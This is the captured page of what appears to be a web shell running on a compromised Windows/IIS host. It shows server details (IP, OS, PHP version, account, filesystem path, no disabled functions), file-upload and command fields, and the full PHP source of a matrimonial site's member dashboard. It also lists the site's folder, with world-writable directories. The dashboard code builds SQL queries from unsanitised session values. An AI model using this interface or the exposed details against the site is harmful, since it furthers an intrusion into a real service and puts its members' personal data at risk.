Server IP : 50.63.8.133  /  Your IP : 18.116.36.48
Web Server : Microsoft-IIS/10.0
System : Windows NT P3NWVPWEB032 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : IWPD_10999(xformtec) ( 0)
PHP Version : 5.4.45
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  G:/PleskVhosts/xform.in/madhurivivah.com/member/

Upload File :
Curr3nt_D!r [ Writeable ] D0cum3nt_r0Ot [ Writeable ]

 
Command :
Current File : G:/PleskVhosts/xform.in/madhurivivah.com/member/index2.php
<?php

session_start();
include('include/config.php');

if (strlen($_SESSION['uname']) == 0) {
    header('location:login-register.php');
} else {





    if (isset($_SESSION['member_profile_id']) && $_SESSION['member_profile_id'] != '') {

        $member_profile_id = $_SESSION['member_profile_id'];
        $sql = "SELECT * FROM member_profile WHERE member_profile_id='$member_profile_id'";
        $res = mysqli_query($con, $sql);
        $row = mysqli_fetch_array($res);

        // If the user is registered for the first and not created member profile then this code will execute
        if (!isset($row)) {
            $member_profile_id = $_SESSION['member_profile_id'];
            $sql1 = "SELECT * FROM member WHERE member_profile_id='$member_profile_id'";
            $res1 = mysqli_query($con, $sql1);
            $row1 = mysqli_fetch_array($res1);
        }
    }











?>



    <!DOCTYPE html>
    <html>

    <head>
        <meta charset="UTF-8">
        <title>Madhori Vivah | Member Admin </title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="" />
        <meta name="keywords" content="" />
        <link rel="stylesheet" type="text/css" href="css/animate.css">
        <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
        <link rel="stylesheet" type="text/css" href="css/line-awesome.css">
        <link rel="stylesheet" type="text/css" href="css/line-awesome-font-awesome.min.css">
        <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
        <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css">
        <link rel="stylesheet" type="text/css" href="css/jquery.mCustomScrollbar.min.css">
        <link rel="stylesheet" type="text/css" href="lib/slick/slick.css">
        <link rel="stylesheet" type="text/css" href="lib/slick/slick-theme.css">
        <link rel="stylesheet" type="text/css" href="css/style.css">
        <link rel="stylesheet" type="text/css" href="css/responsive.css">
    </head>

    <body>
        <div class="wrapper">
            <?php include_once('include/header.php'); ?>
            <main>
                <div class="main-section">
                    <div class="container">
                        <div class="main-section-data">
                            <div class="row">
                                <div class="col-lg-3 col-md-4 pd-left-none no-pd">
                                    <div class="main-left-sidebar no-margin">
                                        <div class="user-data full-width">
                                            <div class="user-profile">
                                                <div class="username-dt">
                                                    <div class="usr-pic">
                                                        <img src="../admin/img/profile-photos/<?php echo $row['profile_photo'] ?>" alt="">
                                                    </div>
                                                </div>
                                                <div class="user-specs">
                                                    <h3>
                                                        <?php if (isset($row)) {
                                                            echo $row['first_name'];
                                                        } else {
                                                            echo $row1['first_name'];
                                                        } ?>
                                                        <?php if (isset($row)) {
                                                            echo $row['last_name'];
                                                        } else {
                                                            echo $row1['last_name'];
                                                        } ?>


                                                    </h3>
                                                    <span>Graphic Designer at Self Employed</span>
                                                </div>
                                            </div>
                                            <ul class="user-fw-status">

                                                <li>
                                                    <a href="my-profile-feed.html" title="">View Profile</a>
                                                </li>
                                            </ul>
                                        </div>
                                        <div class="suggestions full-width">
                                            <div class="sd-title">
                                                <h3>Suggestions</h3>
                                                <i class="la la-ellipsis-v"></i>
                                            </div>
                                            <div class="suggestions-list">
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s1.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Jessica William</h4>
                                                        <span>Graphic Designer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s2.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>John Doe</h4>
                                                        <span>PHP Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s3.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Poonam</h4>
                                                        <span>Wordpress Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s4.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Bill Gates</h4>
                                                        <span>C & C++ Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s5.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Jessica William</h4>
                                                        <span>Graphic Designer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s6.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>John Doe</h4>
                                                        <span>PHP Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="view-more">
                                                    <a href="#" title="">View More</a>
                                                </div>
                                            </div>
                                        </div>


                                        <div class="widget suggestions full-width">
                                            <div class="sd-title">
                                                <h3>Most Viewed People</h3>
                                                <i class="la la-ellipsis-v"></i>
                                            </div>
                                            <div class="suggestions-list">
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s1.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Jessica William</h4>
                                                        <span>Graphic Designer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s2.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>John Doe</h4>
                                                        <span>PHP Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s3.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Poonam</h4>
                                                        <span>Wordpress Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s4.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Bill Gates</h4>
                                                        <span>C &amp; C++ Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s5.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>Jessica William</h4>
                                                        <span>Graphic Designer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="suggestion-usd">
                                                    <img src="images/resources/s6.png" alt="">
                                                    <div class="sgt-text">
                                                        <h4>John Doe</h4>
                                                        <span>PHP Developer</span>
                                                    </div>
                                                    <span><i class="la la-plus"></i></span>
                                                </div>
                                                <div class="view-more">
                                                    <a href="#" title="">View More</a>
                                                </div>
                                            </div>
                                        </div>








                                    </div>
                                </div>
                                <div class="col-lg-6 col-md-8 no-pd">
                                    <div class="main-ws-sec">

                                        <div class="posts-section">
                                            <div class="post-bar">
                                                <div class="post_topbar">
                                                    <div class="usy-dt">
                                                        <img src="../admin/img/profile-photos/<?php echo $row['profile_photo'] ?>" style="width: 150px;" alt="">

                                                        <div class="usy-name">
                                                            <h3><?php if (isset($row)) {
                                                                    echo $row['member_profile_id'];
                                                                } else {
                                                                    echo $row1['member_profile_id'];
                                                                } ?>
                                                            </h3>

                                                        </div>
                                                    </div>

                                                </div>

                                                <div class="job_descp">
                                                    <h3> <?php if (isset($row)) {
                                                                echo $row['first_name'];
                                                            } else {
                                                                echo $row1['first_name'];
                                                            } ?>
                                                        <?php if (isset($row)) {
                                                            echo $row['last_name'];
                                                        } else {
                                                            echo $row1['last_name'];
                                                        } ?></h3>

                                                    <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam luctus hendrerit metus, ut ullamcorper quam finibus at. Etiam id magna sit amet... <a href="#" title="">view more</a></p>

                                                </div>
                                                <div class="job-status-bar">

                                                    <a href="#"><i class="fas fa-eye"></i>Views 50</a>
                                                </div>
                                            </div>
                                            <div class="top-profiles">
                                                <div class="pf-hd">
                                                    <h3>Top Profiles</h3>
                                                    <i class="la la-ellipsis-v"></i>
                                                </div>
                                                <div class="profiles-slider">
                                                    <div class="user-profy">
                                                        <img src="images/resources/user1.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                    <div class="user-profy">
                                                        <img src="images/resources/user2.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                    <div class="user-profy">
                                                        <img src="images/resources/user3.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                    <div class="user-profy">
                                                        <img src="images/resources/user1.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                    <div class="user-profy">
                                                        <img src="images/resources/user2.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                    <div class="user-profy">
                                                        <img src="images/resources/user3.png" alt="">
                                                        <h3>John Doe</h3>
                                                        <span>Graphic Designer</span>
                                                        <ul>
                                                            <li><a href="#" title="" class="followw">Follow</a></li>
                                                            <li><a href="#" title="" class="envlp"><img src="images/envelop.png" alt=""></a></li>
                                                            <li><a href="#" title="" class="hire">hire</a></li>
                                                        </ul>
                                                        <a href="#" title="">View Profile</a>
                                                    </div>
                                                </div>
                                            </div>



                                        </div>
                                    </div>
                                </div>
                                <div class="col-lg-3 pd-right-none no-pd">
                                    <div class="right-sidebar">
                                        <div class="widget widget-about">
                                            <img src="images/525.jpg" alt="">
                                            <h3>MADHORI VIVAH</h3>

                                            <div class="sign_link">
                                                <h3><a href="logout.php" title="" style="color: #FF0000 ;">logout</a></h3>

                                            </div>
                                            <div class="sign_link">
                                                <h3><a href="#" title="" style="color: #06A654;"  >Active Membership Plan </a></h3>

                                            </div>
                                        </div>
                                        <div class="widget widget-jobs">
                                            <div class="sd-title">
                                                <h3>Top Jobs</h3>
                                                <i class="la la-ellipsis-v"></i>
                                            </div>
                                            <div class="jobs-list">
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior Product Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior UI / UX Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Junior Seo Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior PHP Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior Developer Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="widget widget-jobs">
                                            <div class="sd-title">
                                                <h3>Most Viewed This Week</h3>
                                                <i class="la la-ellipsis-v"></i>
                                            </div>
                                            <div class="jobs-list">
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior Product Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Senior UI / UX Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                                <div class="job-info">
                                                    <div class="job-details">
                                                        <h3>Junior Seo Designer</h3>
                                                        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit..</p>
                                                    </div>
                                                    <div class="hr-rate">
                                                        <span>$25/hr</span>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div class="tags-sec full-width">
                                            <ul>
                                                <li><a href="#" title="">Help Center</a></li>
                                                <li><a href="#" title="">About</a></li>
                                                <li><a href="#" title="">Privacy Policy</a></li>
                                                <li><a href="#" title="">Community Guidelines</a></li>
                                                <li><a href="#" title="">Cookies Policy</a></li>
                                                <li><a href="#" title="">Career</a></li>
                                                <li><a href="#" title="">Language</a></li>
                                                <li><a href="#" title="">Copyright Policy</a></li>
                                            </ul>
                                            <div class="cp-sec">
                                                <img src="images/logo2.png" alt="">
                                                <p><img src="images/cp.png" alt="">Copyright 2019</p>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </main>



        </div>
        <script type="text/javascript" src="js/jquery.min.js"></script>
        <script type="text/javascript" src="js/popper.js"></script>
        <script type="text/javascript" src="js/bootstrap.min.js"></script>
        <script type="text/javascript" src="js/jquery.mCustomScrollbar.js"></script>
        <script type="text/javascript" src="lib/slick/slick.min.js"></script>
        <script type="text/javascript" src="js/scrollbar.js"></script>
        <script type="text/javascript" src="js/script.js"></script>
    </body>

    </html>
<?php  } ?>
N4m3
5!z3
L45t M0d!f!3d
0wn3r / Gr0up
P3Rm!55!0n5
0pt!0n5
..
--
April 17 2025 11:26:52
0 / 0
0777
css
--
March 07 2024 06:55:30
0 / 0
0777
fonts
--
March 07 2024 06:55:30
0 / 0
0777
images
--
March 07 2024 06:55:30
0 / 0
0777
include
--
March 07 2024 06:55:30
0 / 0
0777
js
--
March 07 2024 06:55:30
0 / 0
0777
lib
--
March 07 2024 06:55:30
0 / 0
0777
vendor
--
August 08 2023 00:14:20
0 / 0
0777
.htaccess
0.208 KB
June 19 2023 22:18:28
0 / 0
0666
dashboard.php
32.748 KB
January 11 2023 20:30:48
0 / 0
0666
edit-addresh-information.php
3.123 KB
June 12 2022 01:15:38
0 / 0
0666
edit-education-information.php
2.238 KB
June 12 2022 00:54:56
0 / 0
0666
edit-expectation.php
1.87 KB
June 17 2022 02:38:28
0 / 0
0666
edit-family-information.php
2.656 KB
June 12 2022 00:58:58
0 / 0
0666
edit-horoscope-information.php
3.712 KB
June 12 2022 01:04:18
0 / 0
0666
edit-personal-information.php
14.466 KB
April 05 2023 19:22:16
0 / 0
0666
edit-profile-photo.php
2.321 KB
October 11 2022 07:26:46
0 / 0
0666
edit-profile.php
6.842 KB
May 02 2022 22:06:54
0 / 0
0666
error_log
928.755 KB
April 11 2024 08:54:18
0 / 0
0666
index.php
32.134 KB
May 28 2022 06:44:08
0 / 0
0666
index2.php
32.134 KB
October 11 2022 07:22:56
0 / 0
0666
login-register.php
16.696 KB
June 05 2022 00:20:16
0 / 0
0666
logout.php
0.122 KB
June 24 2022 23:57:46
0 / 0
0666
member-profile.php
36.488 KB
November 26 2022 17:42:24
0 / 0
0666
member.php
60.54 KB
March 31 2022 22:03:52
0 / 0
0666
membership.php
6.756 KB
October 06 2022 19:42:22
0 / 0
0666
my-profile-feed.php
177.77 KB
March 31 2022 22:02:20
0 / 0
0666
profile-account-setting.php
19.033 KB
June 12 2022 00:50:00
0 / 0
0666
profiles.php
9.243 KB
October 07 2022 18:25:34
0 / 0
0666
selected-profile.php
5.765 KB
November 18 2022 23:28:10
0 / 0
0666
user-profile.php
34.049 KB
June 10 2022 01:13:24
0 / 0
0666
view-profile.php
33.117 KB
October 06 2022 19:16:08
0 / 0
0666